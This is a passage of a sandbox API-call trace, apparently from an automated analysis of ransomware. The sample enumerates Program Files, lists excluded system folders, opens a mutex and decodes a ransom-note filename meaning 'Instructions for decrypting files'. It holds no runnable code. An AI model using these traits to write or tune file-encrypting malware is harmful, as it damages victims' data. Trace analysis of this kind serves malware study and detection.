cAlternateFileName="㷴V䱠@㸼V企@\x18㤄X頻\x18\x81")) returned 0xffffffff [0104.144] GetLastError () returned 0x2 [0104.145] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Backupe") returned 6 [0104.145] FindFirstFileW (in: lpFileName="C:\\Program Files\\Backup", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18\x88")) returned 0xffffffff [0104.145] GetLastError () returned 0x2 [0104.145] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="backup㤀X ") returned 6 [0104.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Reserve") returned 6 [0104.146] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reserv", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㸼V企@\x18㤄X頻\x18\x8f")) returned 0xffffffff [0104.146] GetLastError () returned 0x2 [0104.146] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X ") returned 6 [0104.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Restore") returned 7 [0104.146] FindFirstFileW (in: lpFileName="C:\\Program Files\\Restore", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18\x97")) returned 0xffffffff [0104.147] GetLastError () returned 0x2 [0104.147] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.147] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0104.147] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.147] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.147] GlobalUnlock (hMem=0x45000c) returned 0 [0104.147] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.147] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.147] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.147] GlobalUnlock (hMem=0x45000c) returned 0 [0104.147] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.147] GlobalUnlock (hMem=0x450004) returned 0 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e") returned 46 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\e") returned 15 [0104.149] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.149] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\e") returned 11 [0104.149] GlobalLock (hMem=0x450004) returned 0x588000 [0104.149] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.149] GlobalUnlock (hMem=0x450004) returned 0 [0104.149] GlobalLock (hMem=0x450004) returned 0x588000 [0104.149] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.149] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.149] GlobalUnlock (hMem=0x450004) returned 0 [0104.149] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.149] GlobalUnlock (hMem=0x45000c) returned 0 [0104.149] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\e") returned 15 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\e") returned 11 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\e") returned 9 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=18, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\e") returned 18 [0104.151] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\e") returned 28 [0104.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=10, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\e") returned 10 [0104.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\e") returned 8 [0104.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\e") returned 9 [0104.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.201] SHGetMalloc (in: ppMalloc=0x18f78c | out: ppMalloc=0x18f78c*=0x767666bc) returned 0x0 [0104.201] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f788 | out: ppidl=0x18f788) returned 0x0 [0104.201] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.202] SysReAllocStringLen (in: pbstr=0x18f810*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f810*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.202] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.203] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.203] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.203] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.203] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.203] GlobalUnlock (hMem=0x45000c) returned 0 [0104.203] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.203] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.203] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.203] GlobalUnlock (hMem=0x45000c) returned 0 [0104.203] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.203] GlobalUnlock (hMem=0x450004) returned 0 [0104.203] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e78 [0104.203] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.204] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0104.204] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0104.204] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: lpLocalFileTime=0x18f788) returned 1 [0104.204] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.204] GlobalLock (hMem=0x450004) returned 0x588000 [0104.204] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.204] GlobalUnlock (hMem=0x450004) returned 0 [0104.204] GlobalLock (hMem=0x450004) returned 0x588000 [0104.204] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.204] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.204] GlobalUnlock (hMem=0x450004) returned 0 [0104.204] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.204] GlobalUnlock (hMem=0x45000c) returned 0 [0104.204] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.205] CharLowerBuffW (in: lpsz="desktop.ini", cchLength=0xb | out: lpsz="desktop.ini") returned 0xb [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e724, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\desktop.ini", cchWideChar=28, lpMultiByteStr=0x18e700, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\desktop.ini#M@", lpUsedDefaultChar=0x0) returned 28 [0104.205] CharLowerBuffW (in: lpsz=".ini", cchLength=0x4 | out: lpsz=".ini") returned 0x4 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x18e724, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".iniñ", lpUsedDefaultChar=0x0) returned 4 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddec21c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddec21c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdde29c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde29c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xddee8320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddee8320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xddf0e480, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf0e480, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde29c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde29c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde03ae0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde03ae0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdf61d9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf61d9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde9c060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde9c060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, 